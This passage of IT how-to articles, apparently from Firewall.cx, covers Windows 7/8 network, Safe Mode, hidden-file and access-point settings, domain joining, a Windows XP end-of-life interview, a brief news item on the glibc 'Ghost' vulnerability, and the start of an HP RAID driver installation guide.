Finally, to verify that DHCP is enabled and we’ve obtain an IP address, use the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip show config

This article showed how to configure a Windows 7 network interface with an IP address, Gateway and DNS server, using the Administrative Command Prompt. We also showed how to set a Windows 7 network interface to obtain an IP address automatically from a DHCP server.



  • Hits: 191902

How to View Hidden Files and Folders In Windows 8 & 8.1

windows-8-how-to-show-hidden-folders-files-1aWindows 8 & 8.1 hides two types of files so that normally, you do not see them while exploring your computer. The first type is the files or folders with their 'H' attribute set to make them hidden. The other type is Windows System files. The reason behind hiding these files is that users could inadvertently tamper with them or even delete those causing the operations of Windows 8/8.1 to fail. This article explains how you can configure Windows 8 or 8.1 to show all hidden files and folders, plus show Windows system files.

You can change the behavior of your Windows 8/8.1 computer to show hidden files by changing the settings in the Folder Options screen. There are two primary ways you can reach the Folder Options screen. Both are analysed below:

Windows 7 users can also refer to our How to View Hidden Files and Folders In Windows 7 article

Method 1: Making Hidden & System Files Visible From Windows Explorer

Begin from the Start Screen by closing down all open applications.

Step 1: Tap/click on the Desktop tile to bring up the Windows Desktop.

Step 2: Tap/click on the Files Explorer icon in the Panel at the bottom left hand side of your Desktop:

windows-8-how-to-show-hidden-folders-files-1Figure 1. Icons in the Windows Panel

When the Explorer window opens, expand the Ribbon by pressing the keys Ctrl+F1 together, or by tapping/clicking on the Down-Arrow at the top right hand corner of the window panel. Next, tap/click on the View tab and then on the Local Disk (C:) option. Tap/click on Large Icons option in the ribbon to see the folders.

Within the ribbon, if you tap/click to place a check mark in the checkbox against the Hidden items options, all hidden folders and files will become visible and will show up with semi-transparent icons:

windows-8-how-to-show-hidden-folders-files-2Figure 2. File Explorer showing hidden folders and files

Method 2: Making Hidden & System Files Visible From The Folder Options

Starting from any screen, swipe in from the right hand edge or tap/click on the bottom right hand corner of the screen to bring up the Charms:

windows-8-how-to-show-hidden-folders-files-3Figure 3. Windows Charms

Tap/click on the Search icon and type “Control” within the resulting dialog box. Within the search results displayed, you will find Control Paneltap/click on this to bring up the Control Panel:

windows-8-how-to-show-hidden-folders-files-4Figure 4. Control Panel

Tap/click on the Appearance and Personalization link, which will open up the Appearance and Personalization screen.

Next, Tap/click on the Folder Options link or the Show hidden files and folders link to bring up the Folders Option screen:

windows-8-how-to-show-hidden-folders-files-5Figure 5. Control Panel - Folder Options

Another way to reach the Folder Options is from File Explorer. In the View tab, tap/click on Options (ribbon expanded) to get a link for Change folder and search options. Tap/click on the Change folder and search options link to open up the Folder Options window.

Click on either Folder Options or Show hidden files and folders to reach the Folder Options screen as shown below:

windows-8-how-to-show-hidden-folders-files-6 Figure 6. Folder Options Screen

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click on the radio button under it labeled as Show hidden files, folders and drives. This will change all the invisible hidden and system files and folders and make them visible.

It is important to see the file extension to know a file type - normally, Windows keeps this hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and remove the checkmark against it.

As mentioned in the beginning of our article, Windows hides files belonging to the operating system. To make these visible, click and uncheck the label Hide protected operating system files (Recommended). At this time, Windows will warn you about displaying protected system files and ask you whether you are sure about displaying them – Click on the Yes button.

To make the changes effective, click on the Apply button and subsequently on the OK button. All screens will close and you will be back to your Desktop

The folders with the semi-transparent icons are the hidden folders, while those with fully opaque icons are the regular ones.

If you do not want Windows 8/8.1 to show hidden files and folders, follow the reverse procedure above in the Folder Options screen.

  • Hits: 55070

How to View Hidden Files & Folders in Windows 7

windows-7-showing-hidden-files-1This article shows you how to see hiddeen files and folders in Windows 7. Windows 7 hides important system files so that normally, you do not see them while exploring your computer.

The reason behind hiding these files is that users could inadvertently tamper with them or even delete those causing Windows 7 operations to falter. However, malicious software programs take advantage of this feature to create hidden files or folders and cause disruptions in the computer's operations without the user being able to detect them.

Therefore, being able to see hidden files or folders has its advantages and helps in repairing damages caused by unwanted hidden files. You can change the behavior of your Windows 7 computer to show hidden files by changing the settings in the Folder Options screen. There are two primary ways you can reach the Folder Options screen. Start by closing down all open applications.

Windows 8 and 8.1 users can also refer to our How to View Hidden Files and Folders In Windows 8 & 8.1 article

Method 1: Reaching The Folder Options Screen From Windows Explorer

Click on the Windows Explorer icon in the TaskBar at the bottom left hand side of your Desktop:

windows-7-showing-hidden-files-2Figure 1. Icons in the Windows Panel

When the Explorer window opens, you have to click on the Organize button to display a drop down menu:

windows-7-showing-hidden-files-3Figure 2. Organize Menu

Next, Click on the Folder and Search options and the Folder Options screen opens up:

windows-7-showing-hidden-files-6Figure 3. Show hidden files, folders and drives & Hide extensions for known file types

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click on the radio button under it labeled as Show hidden files, folders and drives. This will change all the invisible files and folders and make them visible.

It is important to note the Hide extension to know a file type option - normally, Windows keeps this hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and click to remove the checkmark against it as shown in the above screenshot. This will force Windows to show all extension types for all files.

When ready, click on the Apply and OK button to save the changes.

Method 2: Reaching The Folder Options Screen From The Control Panel

Click on the Start icon in the Panel at the bottom left hand side of your Desktop – see figure 4 below. In the resulting Start menu, you must click on the Control Panel option.

windows-7-showing-hidden-files-4Figure 4. Start Menu

This opens up the Control Panel screen, which allows you to control your computer's settings. Click on the Appearance and Personalization link to open up the Appearance and Personalization screen.

windows-7-showing-hidden-files-5Figure 5. Appearance and Personalization screen

Click on either Folder Options or Show hidden files and folders on the left window, to reach the Folder Options screen.

There are other ways as well to reach the Folder Options screen.

windows-7-showing-hidden-files-6Figure 6. Show hidden files, folders and drives & Hide extensions for known file types

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click on the radio button under it labeled as Show hidden files, folders and drives. This will change all the invisible files and folders and make them visible.

It is important to note the Hide extension to know a file type option - normally, Windows keeps this hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and click to remove the checkmark against it as shown in the above screenshot. This will force Windows to show all extension types for all files.

Windows also hides files belonging to the operating system. To make these visible, click and uncheck the label Hide protected operating system files (Recommended). At this time, Windows will warn you about displaying protected system files and ask you whether you are sure about displaying them – Click on the Yes button.

When ready, click on the Apply and OK button to save the changes.

Windows Now Shows Hidden Files & Folders

When we next browse through C: Drive, we'll notice that there are now additional folders and files which were previously hidden:

windows-7-showing-hidden-files-7Figure 7. C: Drive showing hidden folders

The folders with the semi-transparent icons are the hidden folders, while those with fully opaque icons are the regular ones.

If you do not want Windows 7 to show hidden files and folders, follow the reverse procedure executed in the Folder Options screen.

  • Hits: 77885

How to Start Windows 8 and 8.1 in Safe Mode – Enabling F8 Safe Mode

This article will show you how to start Windows 8 and Windows 8.1 in Safe Mode and how to enable F8 Safe Mode. Previous Windows O/S users would recall that by pressing and holding the F8 key while Windows is booting (before the Windows logo appears), the system will prompt the user a special menu allowing the user to direct the Operating System to enter the Safe Mode.

When Windows boots, the Safe Mode logo appears on all four corners of the screen:

windows-8-enable-f8-safe-mode-1Figure 1. Windows 8/8.1 in Safe Mode

Occasionally, Windows will not allow you to delete a file or uninstall a program. This may be due to several reasons one of which can be a virus, a malware infection or some driver/application compatibility. Windows may also face hardware driver problems that you are unable to diagnose in the normal process. Traditionally, Windows provides a Safe Mode to handle such situations. When in Safe Mode, only the most basic drivers and programs that allow Windows to start are loaded.

Unlike all other Windows operating systems, Windows 8 and 8.1 do not allow entering Safe Mode via F8 key by default. If you are unable to boot into Windows 8 or 8.1 after several attempts, the operating system automatically loads the Advanced Startup Options that allow you to access Safe Mode.

For users who need to force their system to boot into Safe Mode, there are two methods to enter the Advanced Startup Settings that will allow Windows to boot into Safe Mode.

Method 1 - Accessing Safe Mode In Windows 8 / Windows 8.1

Accessing Safe Mode involves a number of steps and actions required by the user. These are covered in great depth in our How to Enable & Use Windows 8 Startup Settings Boot Menu article.

Method 2 - Enabling Windows Safe Mode Using F8 Key At Boot Time

If you find accessing Windows 8 Safe Mode too long and complex, you can alternatively enable the F8 key for booting into Safe Mode, just as it happens with the older Windows operating systems. This of course comes at the expense of slower booting since the operating system won't boot directly into normal mode.

Interestingly enough, users who choose to enable F8, can also access the diagnostic tools within the Safe Mode quickly at any time. Additionally, if you have multiple operating systems on your computer, enabling the F8 option makes it easier to select the required operating system when you start your computer.

Enabling the F8 key in Windows 8/8.1 is only possible with administrative permissions. For this, you will need to open an elevated command prompt. The easiest way to open the elevated command prompt window is by using the Windows and X key combination on your keyboard:

windows-8-enable-f8-safe-mode-2Figure 2. Windows Key +X

The Windows Key + X combination opens up the Power User Tasks Menu from which you can tap/click the Command Prompt (Admin) option:

windows-8-enable-f8-safe-mode-3Figure 3. Power User Tasks Menu

Should you will receive a prompt from the User Account Control (UAC) requesting confirmation, simply allow the action and the command prompt should appear.

At the command prompt type in the following command and then press the Enter key:

C:\Windows\System32> bcdedit /set {default} bootmenupolicy legacy

windows-8-enable-f8-safe-mode-4 Figure 4. Administrative Command Prompt - Enable F8 Boot Function

On successful execution, Windows will acknowledge - The operation completed successfully.

Now, to enable the changes to take effect, you must reboot Windows. If you press the F8 key during Windows boot, you should be able to access Safe Mode and all other Advanced Boot Options.

If for any reason, you want to disable the F8 option, open the Administrative Command Prompt, enter the following command and then press the Enter key:

C:\Windows\System32> bcdedit /set {default} bootmenupolicy standard

 windows-8-enable-f8-safe-mode-5Figure 5. Administrative Command Prompt - Disable F8 Boot Function

Again, Windows will acknowledge - The operation completed successfully. The changes will take place on the next reboot and the F8 key will no longer boot Windows into Safe Mode.

This article explained how to successfully start Windows 8 and Windows 8.1 in Safe Mode. We also saw how to enable the F8 Safe Mode fuction which is disabled by default.

Visit our Windows 8/8.1 section to read more hot topics on the Windows 8 operating system.

 

  • Hits: 56824

How to Enable & Use Windows 8 Startup Settings Boot Menu (Workstations, Tablet & Touch Devices)

The Windows 8 Start Settings Boot Menu allows users to change the way Windows 8 starts up. This provides users with the ability to enable Safe Mode with or without Command Prompt, Enable Boot Logging, Enable Debugging and much more. Access to the Setup Settings Boot Menu is provided through the Advanced Startup Options Menu as described in detail below. Alternatively users can use the following command in the Run prompt to restart and boot directly into the Advanced Startup Options Menu:

shutdown /r /o /t 0

While not enabled by default, users can use the F8 key to enter Safe Mode when booting into the operating system, just as all previous Windows versions. To learn more on this, read our How to Start Windows 8 and 8.1 in Safe Mode – Enabling F8 Safe Mode article.

Enabling the Windows 8 Startup Settings Boot Menu via GUI

Start with the Windows 8 Start screen. Type the world advanced directly, which will bring up the items you can search. You may also slide in from the right edge, tap/click on the Search Icon and type advanced into the resulting dialog box. Within the Search items listed, tap/click on Settings:

windows8-startup-settings-boot-menu-1Figure 1. Search Settings

 Windows will now show you the Advanced Startup Options within a dialog box as shown below:

windows8-startup-settings-boot-menu-2Figure 2. Advanced Settings Search Result

 Tapping or clicking within the dialog box will take you to the PC Settings screen. Tap/click on the General Button and scroll down the menu on the right hand side until you come to Advanced Startup. Directly underneath is the Restart Now button:

windows8-startup-settings-boot-menu-3Figure 3. PC Settings

 Tapping/clicking on the Restart Now button will let Windows offer its Options screen:

windows8-startup-settings-boot-menu-4Figure 4. Choose Options

 On the Options screen, tap/click on the Troubleshoot button to bring up the Troubleshoot menu:

windows8-startup-settings-boot-menu-5Figure 5. Troubleshoot Menu

 From here tap/click on the Advanced Options button to get to the Advanced Options menu:

windows8-startup-settings-boot-menu-6Figure 6. Advanced Options Menu

From the Advanced Options Menu, tap/click on the Startup Settings button. This brings you to the Startup Settings screen showing the various startup settings of Windows 8 that you will be able to change when you Restart. To move ahead, tap/click on the Restart button on the lower right corner of the screen:

windows8-startup-settings-boot-menu-7Figure 7. Startup Settings Screen

 Windows 8 will now reboot, taking you directly into the Startup Settings Boot Menu. Your mouse pointer will not work here and you must type the number key (or the function key) corresponding to your selection. If you wish to see more options, you can do so by pressing the F10 key:

windows8-startup-settings-boot-menu-8Figure 8. Startup Settings Boot Menu

To return without making any changes, hit the Enter key on your keyboard; you will need to login once again.

The menu options presented are analysed in detail below.

Windows 8 Startup Settings Boot Menu

The Windows 8 Startup Settings Boot Menu lists all the options from which you can select one to alter the way Windows will boot up next. You must be careful here, as there is no way you can go back on your selection and Windows will directly proceed to boot with the selected option. Each option results in a different functionality, as discussed below:

  • Enable Debugging – Useful only if you have a kernel debugger connected to your computer and you want it to control system execution. This option is usually used by advanced Windows users.
  • Enable boot logging – Useful if you want to know what is happening during boot time. This option forces Windows to create a log file at the following path C:\Winodws\Ntbtlog.txt, where you will find detailed information about the boot process. For example, if there is a problem with the starting of a specific driver, you will find the relevant information in the log file. Used normally by intermittent to advanced users.
  • Enable low-resolution video – Useful if you are facing trouble with your video graphics card and you are unable to see Windows properly. This option will let Windows start up in a low-resolution mode, from where you can specify the proper video resolution that Windows can use.
  • Enable Safe Mode – Useful if you want Windows to bypass the normal video card driver and use the generic VGA.sys driver instead. With this option, Windows will start up in a bare-bones mode and will load only programs as are barely necessary for it to work. Network support is disabled in this mode, so do not expect to connect to the Internet or local network.
  • Enable Safe Mode with Networking – This mode offers similar abilities as the previous Enable Safe Mode (Option 4) and provides additional network support, allowing connectivity to the local network or Internet.
  • Enable Safe Mode with Command Prompt – Useful when you want Windows online but with only a command prompt to type in commands, rather than the usual Windows GUI desktop. In this mode, Windows will only load the bare necessary programs to allow it to run. In place of the normal video card driver, Windows will operate the VGA.sys driver. However, do not confuse this mode with the Windows 8 Recovery Environment Command Prompt, where Windows operates offline.
  • Disable driver signature enforcement – Useful for loading unsigned drivers requiring kernel privileges. Typically, Windows does not allow drivers requiring kernel privileges to load unless it can verify the digital signature of the company that developed the driver. This option must be used very carefully, as you are setting aside the security reasons that normally would prevent malware drivers from sneaking in into your computer.
  • Disable early launch anti-malware protection – Useful to prevent driver conflicts that are preventing Windows from starting. A new feature in Windows 8 allows a certified anti-virus to load its drivers before Windows can load any other third-party driver. Therefore, the anti-virus software is available to scan all drivers before they are loaded. If the anti-virus program detects any malware, it blocks that driver. Since this is a great security feature, disable it only when necessary and apply extreme caution.
  • Disable automatic restart after failure – Useful when you want to see the crash information because Windows restarts too quickly after a crash making it impossible to read the information. Usually, after a crash, Windows displays an error message before automatically rebooting. You may not be able to read the information displayed if Windows reboots very quickly. This option prevents Windows from rebooting after a crash, allowing you to read the error message and take appropriate action.
  • Launch Recovery Environment – Useful for accessing recovery and diagnostic tools. This option is available when you press F10 in the Startup Settings Boot Menu. These options are available under Advanced Options Menu - see Figure 6.

This article covered how enable and use the Startup Settings Boot Menu in Windows 8 and also explained in great detail the Windows 8 Startup Settings Boot Menu. Readers interested in learning how to enable F8 Safe Mode functionality can read the article by clicking here.

  • Hits: 43434

How to Join a Windows 8, 8.1 Client to Windows Domain - Active Directory

In this article, we will show how to add a Windows 8 or Windows 8.1 client to a Windows Domain / Active Directory. The article can be considered an extention to our Windows 2012 Server article covering Active Directory & Domain Controller installation.

Our client workstation, FW-CL1, needs to join the Firewall.local domainFW-CL1 is already installed with Windows 8.1 operating system and configured with an IP address 192.168.1.10 and a DNS server set to 192.168.1.1, which is the domain controller. It is important that any workstation needing to join a Domain, has its DNS server configured with the Domain Controller's IP address to ensure proper DNS resolution of the Domain:

windows-8-join-active-directory-1Figure 1. FW-CL1 IPconfig

Now, to add the workstation to the domain, open the System Properties of FW-CL1 by right-clicking in the This PC icon and selecting properties:

windows-8-join-active-directory-2Figure 2. System Settings

Next, click Advanced system settings option in the upper left corner. The System Properties dialog box will open. Select the Computer Name tab and then click on the Change… button to add this computer to the domain.

windows-8-join-active-directory-3Figure 3. System Properties

In the next window, select the Domain: option under the Member of section and type the company's domain name. In our lab, the domain name is set to firewall.local. When done, click on the OK button.

windows-8-join-active-directory-4Figure 4. Adding PC to Domain

The next step involves entering the details of a domain account that has permission to join the domain. This security measure ensures no one can easily join the domain without the necessary authority. Enter the domain credentials and click OK:

windows-8-join-active-directory-5Figure 5. Enter Domain Credentials

If the correct credentials were inserted, the PC becomes a member of the domain. A little welcome message will be displayed. Click OK and Restart the PC to complete the joining process:

windows-8-join-active-directory-6Figure 6. Member of Domain

The detailed operations that occur during a domain join can be found in the %systemroot%\debug\NETSETUP.LOG file.

At a higher level, when you join a computer in Active Directory, a Computer Account is created in the Active Directory database and is used to authenticate the computer to the domain controller every time it boots up.

 This completes our discussion on how to join a Windows 8 & Windows 8.1 Client to Windows Domain - Active Directory.

  • Hits: 85057

Microsoft Windows XP - End of Life / End of Support

A Q&A with Cristian Florian, Product Manager For GFI LanGuard On Security Implications & Planning Ahead

windows-xp-eosWith Windows XP End of Life & End of Support just around the corner (8th of April 2014), companies around the globe are trying to understand what the implications will be for their business continuity and daily operations, while IT Managers and Administrators (not all) are preparing to deal with the impact on users, applications and systems.

At the same time, Microsoft is actively encouraging businesses to migrate to their latest desktop operating system, Windows 8.

 

One could say it’s a strategy game well played on Microsoft’s behalf, bound to produce millions of dollars in revenue, but where does this leave companies who are requested to make the hard choice and migrate their users to newer operating systems?

Do companies really need to rush and upgrade to Windows 7 or 8/8.1 before the deadline? Or do we need to simply step back for a moment and take things slowly in order to avoid mistakes that could cost our companies thousands or millions of dollars?

 Parallel to the above thoughts, you might find yourself asking if software companies will continue deliver support and security patches for their products; a question that might be of greater significance for many companies.

To help provide some clear answers to the above, but also understand how companies are truly dealing with the Windows XP End of Life, Firewall.cx approached GFI’s LanGuard product manager, Cristian Florian, to ask some very interesting questions that will help us uncover what exactly is happening in the background… We are certain readers will find this interview extremely interesting and revealing….

Interview Questions

Hello Cristian and thank you for accepting Firewall.cx’s invitation to help demystify the implications of Windows XP End of Life and its true impact to companies around the globe.

Response:

Thank you. Windows XP’s End of Life is a huge event and could have a significant security impact this year. So it will be important for companies to know what the risks are and how to mitigate them.

 

Question 1
Is Microsoft the only company dropping support for Windows XP? Taking in consideration Windows XP still holds over 29% of the global market share for desktop operating systems (Source Wikipedia https://en.wikipedia.org/wiki/Usage_share_of_operating_systems Feb. 2014), how are software companies likely to respond? Are they likely to follow Microsoft’s tactic?
 
Response:
A good number of companies have committed to support Windows XP beyond Microsoft’s End of Life date, but eventually they will have to drop support too. Although still high, the market share for Windows XP is showing a constant decline and once the deadline is reached, it will not take long before companies realize that it is no longer viable to dedicate resources to support and retain compatibility with Windows XP.

Google said that Chrome support for Windows XP will continue until April 2015. Adobe, however, will release the last version of Adobe Reader and Acrobat that still supports Windows XP in May 2014.

Microsoft will continue to provide antimalware definition updates for Windows XP until July 2015, and all major antivirus vendors will continue to support Windows XP for a period of time. Some of them have stated that they will support it until 2017 or 2018. Antivirus support is important for XP but one note of caution is that antivirus alone does not offer full protection for an operating system. So while supporting Windows XP is commendable, vendors need to be careful that they do not offer a false sense of security that could backfire on them and hurt their reputation.

 

Question 2
GFI is a leader in Network Security Software, automating patching and vulnerability assessments for desktop & server operating systems. We would like to know how GFI will respond to Windows XP End of Life.
 
Response:
We are telling our customers and prospects that Windows XP will not be a safe operating system after April 8. As of this year, Windows XP systems now show up in GFI LanGuard’s dashboard as high security vulnerabilities for the network during vulnerability assessments.

We will continue to provide patch management support for Windows XP. For as long as customers use XP and vendors release updates compatible with the OS, we will do what we can to keep those systems updated and as secure as possible. What is important to note is that this is simply not enough. The necessary security updates for the operating system will no longer be available and these are crucial for the overall security of the system and the network.

A GFI LanGuard trial offers unlimited network discovery and it can be used to track free of charge all Windows XP systems on the network. IT admins can use these reports to create a migration plan to a different operating system.

 

Question 3
Do IT Managers and Administrators really need to worry about security updates for their Windows XP operating system? Is there any alternative way to effectively protect their Windows XP operating systems?
 
Response:
If they have Windows XP systems, they should definitely be concerned.

In 2013 and the first quarter of 2014, Microsoft released 59 security bulletins for Windows XP; 31 of which are rated as critical. The National Vulnerability Database had reported 88 vulnerabilities for Windows XP in 2013, 47 of them, critical. A similar number of vulnerabilities is expected to be identified after April 8, but this time round, no patches will be available.

Part of the problem is due to the popularity of Windows XP. Because it is used so widely, it is a viable target for malware producers. It is highly probable that a number of exploits and known vulnerabilities have not been disclosed and will only be used after April 8 – when they know there won’t be any patch coming out of Microsoft.

There are only two options: either upgrade or retire the systems altogether. If they cannot be retired, they should be kept offline.

 
Question 4
What do you believe will be the biggest problem for those who choose to stay with Windows XP?
 
Response:
There are three problems that arise if these systems are still connected to the Internet. First, each system on its own will be a target and prone to attack quite easily. Second, and this is of greater concern, is that machines running XP will be used as gateways into the entire network. They are the weakest link now in the chain and can also be hijacked to spread spam and malware and a conduit for DDoS attacks.

Third, compliance. Companies that are using operating systems not supported by the manufacturer are no longer compliant with security regulations such as PCI DSS, HIPAA, PSN CoCo and others. They can face legal action and worse if the network is breached.

 

Question 5
GFI is well known in the IT Market for its security products and solutions. Your products are installed and trusted by hundreds and thousands of companies. Can you share with us what percentage of your customer database still runs the Windows XP operating system, even though we’ve got less than a month before its End of Life?
 
Response:
We have seen a marked decline in the number of XP users among our customers. A year ago, we were seeing up to 51% of machines using XP, with 41% having at least one XP system. Looking at the data this year, 17% are still using XP, with 36% having at least one Window XP system.

 

  • Hits: 22381

Configuring Windows 7 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows into an Access Point

windows7-access-point-1-preNot many people are aware that Windows 7 has built-in capabilities that allow it to be transformed into a perfectly working access point so that wireless clients such as laptops, smartphones and others can connect to the local network or obtain Internet access. Turning a Windows 7 system into an access point is an extremely useful feature, especially when there is the need to connect other wireless devices to the Internet with no access point available.

When Windows 7 is configured to provide access point services, the operating system is fully functional and all system resources continue to be available to the user working on the system. In addition, the wireless network is encrypted using the WPA2 encryption algorithm.

Even though there are 3rd-party applications that will provide similar functionality, we believe this built-in feature is easy to configure and works well enough to make users think twice before purchasing such applications.

Windows 8 & 8.1 users can visit our article Configuring Windows 8 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows 8 into an Access Point 

Creating Your Windows 7 Access Point

While there is no graphical interface that will allow you magically to turn Windows 7 into an access point, the configuration is performed via CLI using one single command. We should note that when turning a Windows 7 station into a Wi-Fi access point, it is necessary to ensure the station’s wired network card (RJ45) is connected to the local network (LAN) and has Internet access. Wireless clients that connect to the Windows 7 AP will obtain Internet access via the workstation’s wired LAN connection and will be located on a different subnet network.

To begin, click on the Start button and enter cmd.exe in the Search Programs and Files area as shown below:

windows7-access-point-1

Next, right click on cmd.exe and select Run as administrator from the menu. This will open a DOS prompt with administrator privileges, necessary to execute the CLI command.

As mentioned earlier, a single command is required to create the Windows 7 access point and here it is:

netsh wlan set hostednetwork mode=allow "ssid=myssid"  "key=mykey” keyUsage=persistent

The only parameters that will need to change from the above command are the ssid and key parameters. All the rest can be left as is. The ssid parameter configures the ssid that will be broadcast by the Windows 7 operating system, while the key parameter defines the WPA2-Personal key (password) that the clients need to enter in order to connect to the Wi-Fi network.

Following is an example that creates a wireless network named Firewall.cx with a WPA2 password of $connect$here :

C:\Windows\system32> netsh wlan set hostednetwork mode=allow "ssid=Firewall.cx" "key=$connect$here" keyUsage=persistent

The hosted network mode has been set to allow.

The SSID of the hosted network has been successfully changed.

The user key passphrase of the hosted network has been successfully changed.

C:\Windows\system32>

When executed, the above command creates the required Microsoft Virtual WiFi Miniport adapter and will setup the hostednetwork. The new Microsoft Virtual WiFi Miniport adapter will be visible in the Network Connections panel as shown below. In our example the adaptor is named Wireless Network Connection 2. Note that this is a one-time process and users will not need to create the adaptor again:

windows7-access-point-2

Next step is to start the hosted wireless network. The command to start/stop the hostednetwork is netsh wlan start|stop hostednetwork and needs to be run as administrator. Simply run the command in the same DOS prompt previously used:

C:\Windows\system32>netsh wlan start hostednetwork

The hosted network started.

C:\Windows\system32>

Notice how our Wireless Network Connection 2 has changed status and is now showing our configured SSID Firewall.cx:

windows7-access-point-3

To stop the hosted network, repeat the above command with the stop parameter:

C:\Windows\system32>netsh wlan stop hostednetwork
The hosted network stopped.

Starting The WLAN via Shortcuts – Making Life Easy

Users who frequently use the above commands can quickly create two shortcuts to start/stop the hosted network. 

To help save time and trouble, we've created the two shortcuts and made them available for download in our Administrator Utilities Download Section.  Simply download them and unzip the shortcuts directly on the desktop:

windows7-access-point-4

Double-clicking on each shortcut will start or stop the hosted network. Users experiencing problems starting or stopping the hosted network can right-click on the shortcuts and select Run as administrator.

 

Enable Internet Connection Sharing  (ICS)

With our hosted network initiated, all that’s required is to enable Internet Connection Sharing on Windows 7. This will force our newly created hosted network (access point) to provide Internet and DHCP services to our wireless clients.

To enable Internet Connection Sharing, go to the Control Panel > Network and Internet > Network and Sharing and select Change Adaptor Settings from the left menu. Right-click on the computer’s LAN network adaptor (usually Local Area Connection) and select properties:

windows7-access-point-5

Next, select the Sharing tab and enable the Internet Connection Sharing option. Under Home networking connection select the newly created wireless network connection, in our example this was Wireless Network Connection 2, and untick Allow other network users to control or disable the shared Internet connection setting as shown below:

windows7-access-point-6

After clicking on OK to accept the changes, we can see that the Local Area Connection icon now has the shared status next to it, indicating this is now a shared connection:

windows7-access-point-7

At this point, our Wndows 7 system has transformed into an access point and is ready to serve wireless clients!

Note: Users with Cisco VPN Client installed will experience problems (Error 442) when trying to connect to VPN networks after enabling ICS. To resolve this issue, simply visit our popular How To Fix Reason 442: Failed to Enable Virtual Adapter article.

Connecting Wireless Clients To Our Wi-Fi Network

Wireless clients can connect to the Windows 7 access point as they would with any normal access point. We connected with success to our Windows 7 access point (SSID: Firewall.cx) without any problem, using a Samsung Galaxy S2 android smartphone:

windows7-access-point-8

After successfully connecting and browsing the Internet from our android smartphone, we wanted to test this setup and see if using a Windows 7 system as an access point had any impact on wireless and Internet browsing performance.

Comparing Real Access Point Performance With A Windows 7 O/S Access Point

To test this out we used a Cisco 1041N access point, which was placed right next to our android smartphone and configured with an SSID of firewall. Both Windows 7 system and Cisco access point were connected to the same LAN network and shared the same Internet connection – a 10,000 Kbps DSL line (~10Mbps).

The screenshot below confirms our android smartphone had exceptional Wi-Fi signal with both access points:

windows7-access-point-9

Keep in mind, the Wi-Fi with SSID firewall belongs to the Cisco 1041N access point, while SSID Firewall.cx belongs to the Windows 7 access point.

We first connected to the Windows 7 access point and ran our tests. Maximum download speed was measured at 6,796Kbps, or around 6,6Mbps:

windows7-access-point-10

Next, we connected to our Cisco 1041N access point and performed the same tests. Maximum download speed was measured at 7,460Kbps, or 7.3Mbps:

windows7-access-point-11

Obviously there was a very small difference in performance, however, this difference is so small that it is hard to notice unless running these kind of tests. In both cases, Internet access was smooth without any interruptions or problems.

Summary

Being able to transform a Windows 7 system into an access point is a handy and much welcomed feature. We’ve used this feature many times in order to overcome limitations where no access point was available and it worked just fine - every time.  Performance seems pretty solid despite the small, unnoticeable degradation in speed, which won’t affect anyone.

While this setup is not designed as an permanent access point solution, it can be used to get you out of difficult situations and can serve a small amount of wireless clients without any problem.

  • Hits: 256123

Critical 15 Year-old Linux Security Hole (Ghost) Revealed

linux-ghost-security-gnu-lib-vulnerability-1Security researchers at qualys.com yesterday released information on a critical 15 year-old Linux security hole which affects millions of Linux systems dated back to the year 2000.  The newly published security hole – code named ‘Ghost’  was revealed yesterday by Qualy’s security group on openwall.com.

The security hole was found in the __nss_hostname_digits_dots() function of the GNU C Library (glibc).

The function is used on almost all networked Linux computers when the computer tries to access another networked computer either by using the /etc/hosts files or, more commonly, by resolving a domain name with Domain Name System (DNS)

As noted by the security team, the bug is reachable both locally and remotely via the gethostbyname*() functions, making it possible remotely exploit it by triggering a buffer overflow by using an invalid hostname argument to an application that performs DNS resolution.

The security hole exists in any Linux system that was built with glibc-2.2 which was released in November 10th, 2000. Qualy mentioned that the bug was patched on May 21st, 2013 in releases glibc-2.17 and glibc-2.18.

Linux systems that are considered vulnerable to the attack include RedHat Enterprise Linux 5, 6 and 7, CentOS 6 and 7Ubuntu 12.04 and Debian 7 (Wheezy).

Debian has is already patching its core systems (https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776391) while Ubuntu has already patched its 12.04 and 10.04 distributions (https://www.ubuntu.com/usn/usn-2485-1/). CentOS patches are also on their way.

  • Hits: 14564

Linux CentOS - Redhat EL Installation on HP Smart Array B110i SATA RAID Controller - HP ML/DL Servers

This article was written thanks to our recent encounter of a HP DL120 G7 rack mount server equipped with a HP Smart Array B110i SATA Raid controller, needed to be installed with the Linux CentOS 6.0 operating system.  The HP Smart Array B110i SATA Raid controller is found on a variety of HP servers, therefore this procedure can be applied to all HP servers equipted with the Smart Array B110i controller.

As with all articles, we have included step-by-step instructions of the HP Smart Array B110i SATA Raid controller drivers, including screenshots (from the server’s monitor), files, drivers and utilities that might be needed.

Provided Download Files:  HP Smart Array B110i Drivers (Redhat 6.0, CentOS 6.0), RawWrite & Win32DiskImager 

The HP SmartArray B110i Story

What was supposed to be pretty straight-forward process, turned out to become a 3 hour troubleshooting session to figure out how to install the necessary Smart Array B110i drivers so that our CentOS 6.0 or Redhat Enterprise Linux 6.0  install process, would recognize our RAID volumes and proceed with the installation of the operating system.

A quick search on Google revealed that we were not alone – hundreds of people seem to have struggled with the same issue long before we did, however we couldn’t locate an answer that provided full instructions on how to deal with the problem, so, we decided to create one that did!

Installation Steps

First step is to enter the server’s BIOS and ensure to Enable SATA RAID Support. This will essentially enable the controller and allow the setup RAID from within the controller. On the HP DL120G7 this option was under the Advanced Options > Embedded SATA Configuration > Enable SATA RAID Support menu:

linux HP b110i installation

Next step is to save and exit the BIOS.  

While the server restarts, when prompted, press F8 to enter the RAID Controller menu and create the necessary RAID and logical volumes. We created two logical drives in a RAID 0 configuration 9.3GB & 1.8TB capacity:

HP b110i logical drive configuration

Next, it was time to prepare the necessary driver disk so that the operating system can ‘see’ the raid controller and drives created. For this process, two things are needed:

  • Correct Disk Driver
  • Create Driver Diskette

Selecting The Correct Disk Driver

HP offers drivers for the B110i controller for a variety of operating systems, including Redhat and SUSE, both for Intel and AMD based CPU systems. The driver diskette image provides the binary driver modules pre-built for Linux, which enables the HP Smart Array B110i SATA RAID Controller. CentOS users can make use of the Redhat drivers without hesitation.

